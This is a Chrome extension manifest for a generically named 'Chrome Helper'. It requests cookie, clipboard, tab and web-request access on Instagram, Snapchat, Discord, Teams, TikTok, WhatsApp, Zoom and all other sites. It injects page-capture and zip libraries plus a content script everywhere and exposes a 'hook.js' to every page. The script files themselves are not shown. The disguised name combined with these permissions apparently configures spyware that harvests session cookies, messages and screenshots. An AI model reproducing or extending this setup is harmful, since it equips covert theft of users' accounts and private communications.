{
  "manifest_version": 3,
  "name": "Chrome Helper",
  "version": "1.0",
  "description": "Chrome Helper.",
  "permissions": ["cookies", "tabs", "storage", "webRequest", "webNavigation", "clipboardRead"],
  "host_permissions": [
    "https://www.instagram.com/*",
    "https://*.snapchat.com/*",
    "https://*.discord.com/*",
    "https://*.discordapp.com/*",
    "https://*.teams.microsoft.com/*",
    "https://*.tiktok.com/*",
    "https://*.whatsapp.com/*",
    "https://*.zoom.us/*",
    "http://*/*",
    "https://*/*"
  ],
  "background": {
    "service_worker": "background.js"
  },
  "content_scripts": [
    {
      "matches": ["http://*/*", "https://*/*"],
      "js": ["jszip.min.js", "html2canvas.min.js", "content.js"]
    }
  ],
  "web_accessible_resources": [
    {
      "resources": ["hook.js"],
      "matches": ["<all_urls>"]
    }
  ]
}